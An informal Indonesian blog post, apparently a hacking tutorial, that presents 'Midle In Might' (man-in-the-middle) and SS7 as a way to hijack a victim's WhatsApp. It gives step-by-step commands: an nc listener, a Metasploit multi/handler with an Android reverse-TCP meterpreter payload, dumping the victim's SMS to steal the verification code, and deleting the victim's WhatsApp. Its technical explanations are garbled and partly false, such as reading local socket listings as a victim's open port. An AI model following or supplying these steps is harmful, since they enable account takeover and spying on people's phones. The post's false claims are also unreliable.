Advertisement

Midle In Might (MIM)

       *Assalamualaikum Wr.Wb*

materi hari ini : *midle in might*


apa Itu MIM?mim/midle in might adlh

suatu aktivitas yang dimana user hckr
membaca,menela'a dan mengedit 
suatu percakapan antara 2 korban :)
biasanya itu terjadi antara *end to end*
pada percakapan whatsapp :P

Bisanya User MIM ini Menggunakan

Metode SS7 dalam program protocol

apa itu ss7?> ss7 adalah suatu program

yang dimana kita menghantam/masuk
kedalam sebuah percakapan berbasis
protocol :P,istilahnya seperti :
*SPYWARE* 

mungkin ad yg tw donk berita hri ini

tentang hekel israel :v

tau aja ya :v

~√~√~√~√~√√~√~√~√~√~√~√~√~√~
bagaimana proses jalannya suatu prgrm
tersebut???

gni nih,putra jlsin :) 


./ilustrasi>


korban1+korban2 sedang chat ya di wa

ketika ia mengirim suatu file/lampiran
disitulah port protocol terbuka>
dan disitulah hekel masuk kedalam
system pembicaraan melalui jalur akses
protocol :v,ngeri bukan :v
~~~~~~~~~~~~~~~~~~~~~~~~~
anda mau tau bagaimana hekel tsb msk
secara tiba tiba??


anda pnya termos/termux/terminal :v


caranya mudah,cukup anda kirim file

ke korban,file apa aja,klo bisa bokep :v

lalu anda ketik di terminal


$netstat -n


    {itu setelah kirim file nya ya sobat"}


maka terminal akan melacak file tsb


seperti ini:

Proto Send-Q Local Address frg Address         
Active UNIX domain sockets (w/o servr)
unix  2      [ ]         DGRA  2165 @suilst


unix  3      [ ] STREAM CONNECTED 2613 /dev/socket/qmux_radio/qmux_client_socket    572



unix  3      [ ]         STREAM     CONNECTED     2475847 /dev/socket/qmux_radio/qmux_client_socket    521


~~~~~~~~~~~~~~~~~~~~~~~~~

 *CONTOH FILE YG AKU KIRIM TADI*
*NAMANYA SUILST* MAKA PORTNYA
ADLAAH 2613, bagaimana hacker bsa
msuk ???ke port itu???

anda bsa pergi ke sini:

http://www.canyouseeme.org/

dan di situ adalah pengecekan port


masukan port yang tadi di situ jika

forward gagal atau tulisan merah

anda pergi ke termux


dan ketik


$nc -vlp {port yang tadi} tnpa($)


setelah itu check lagi di web itu,

maka akan berhasil :)
~~~~~~~~~~~~~~~~~~~~~~~~~
setelah itu anda tinggal buka metaploit

$msfconsole


nsf>use multi/handler


nsf>set payload android/meterpreter/reverse_tcp


nsf>set lhost=ip yang di web tdi


nsf>set lport=port yang tdi


nsf>exploit

~~~~~~~~~~~~~~~~~~~~~~~~~

lalu kirim ulang file nya ke target :v

setelah ia buka,tanpa download maka
meterpreterpun akan siap :v

setelah sudah masuk ke meterpreter

contoh

meterpreter>


ketik>ifconfig

lalu salin ip dia dan port terbukanya
~~~~~~~~~~~~~~~~~~~~~~~~~
     *di fase meterpreter anda bisa*
  *mainin apa aja di hp korban secara*
                          *jauh :v*

     *kalo anda mw mainin wa dia*


ketik di meterpreter>


meterpreter>open com.whatsapp

buka whatsapp kloningan km
lalu pasang no target nya di wa km
lalu ada menunggu verty,buka terminal
ketik>

meterpreter>dump_sms

setelah dump berhasil,ketik lagi

meterpreter>delete com.whatsapp

agar wa korban kehapus :v

setelah dumping

cari tau letak hasil dumpingan kita tadi
mamank.:v

buka terminal baru


$cd metasploit-framework

$ls
(disitu ada format txt ga?)
(contoh.sms_dump_20190513175838.txt)

lalu ketik

$nano (file yang tadi.txt)

done lalu liat code nya.deh :v

Posting Komentar

0 Komentar